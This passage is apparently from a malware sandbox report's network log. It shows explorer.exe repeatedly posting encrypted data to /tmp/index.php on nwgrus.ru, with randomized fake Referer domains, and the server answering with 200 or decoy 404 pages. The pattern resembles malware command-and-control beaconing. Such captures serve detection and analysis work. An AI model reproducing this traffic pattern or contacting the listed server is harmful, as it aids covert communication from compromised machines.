Oct 14, 2024 01:52:31.855186939 CEST	343	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5c 59 c6 f3 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu\Yx-]~lpZ"Ae,vUmZM~G?,:@K<~o=GNDYapX2%M519fdPV>k^j#:
Oct 14, 2024 01:52:32.943216085 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:32 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:32.954488039 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tapxxmacigntnnfe.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 360 Host: nwgrus.ru
Oct 14, 2024 01:52:32.954519987 CEST	360	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 5e 59 a1 b6 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu^YsZF>N%-U9(?Obu!1bj_'Lla:QC\|K`]>6WARSMAy7_J9g7B9
Oct 14, 2024 01:52:34.066059113 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:33 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:34.075334072 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vammwtwbjec.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 192 Host: nwgrus.ru
Oct 14, 2024 01:52:34.075371981 CEST	192	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 53 1e c3 88 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuSa]=Ar)~p1Cw\jA;)t2S&eh-+v,n$Er5
Oct 14, 2024 01:52:35.284312010 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:35.292782068 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://akhsodkspgrml.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 361 Host: nwgrus.ru
Oct 14, 2024 01:52:35.292782068 CEST	361	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 49 15 fd 88 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuIE^ar#nK]o:@KaJ.lW\B"\"O8snY["1F"R\+;@\ BBEzCe&OQM`
Oct 14, 2024 01:52:36.394654036 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:36.408469915 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tsjfluqkxyqldltv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 283 Host: nwgrus.ru
Oct 14, 2024 01:52:36.408479929 CEST	283	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2b 2b c6 f5 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu++mXiFd`?IYB M{ezc@[<*}+tT"q8BG%+Sg_>>%g}tL\|p33
Oct 14, 2024 01:52:37.513359070 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:37 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:37.522823095 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xiohrwbimqciogt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: nwgrus.ru
Oct 14, 2024 01:52:37.522850037 CEST	310	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 76 39 bf b9 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuv9H`_}tk`+eKpmZ;>Q0&&XWWB7/ >}Pv.X'b/)Nj/l
Oct 14, 2024 01:52:38.610548973 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:38.624982119 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://omlvjsbjwgbtt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 261 Host: nwgrus.ru
Oct 14, 2024 01:52:38.624982119 CEST	261	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 4f 31 da 96 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuO1qW`CDs QrV~ZyUKFU.?uH=[]e3`-?n7G`;{APhN/cj0`tXh-
Oct 14, 2024 01:52:39.978420019 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 14, 2024 01:52:39.978519917 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:40.123960972 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vsbjnemdwavwq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 325 Host: nwgrus.ru
Oct 14, 2024 01:52:40.124027014 CEST	325	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 40 3e a3 88 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu@>,xw0`:VC-t/gR\^04<$K=xk _{KtU@S'C3ENnSvN\|ae@\
Oct 14, 2024 01:52:41.223464966 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:41.237576008 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lothfyrshwumy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 216 Host: nwgrus.ru
Oct 14, 2024 01:52:41.237576008 CEST	216	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 42 5e ab a8 Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vuB^r>Dj>[[v6.hRlSl2H70U]+xw>O;-D< <xB\C2rD{@
Oct 14, 2024 01:52:42.343538046 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:42.352502108 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://minslgtmvtn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 114 Host: nwgrus.ru
Oct 14, 2024 01:52:42.352502108 CEST	114	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 33 38 df ee Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu38`!c\|O-^;3
Oct 14, 2024 01:52:43.461736917 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:43 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	189.161.95.103	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 01:52:43.505342960 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ccnaltwqqqsxov.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: nwgrus.ru
Oct 14, 2024 01:52:43.505342960 CEST	237	OUT	Data Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3d 07 c8 ad Data Ascii: ;nTiRr\|zh`y7])kP? 9Yt M@NA -[k,vu=Zjo{5by2+m8&wxfAJZQ'VM.Jq"UHasWMEHSc!)IF?@vCL.qKX
Oct 14, 2024 01:52:44.583055019 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 23:52:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 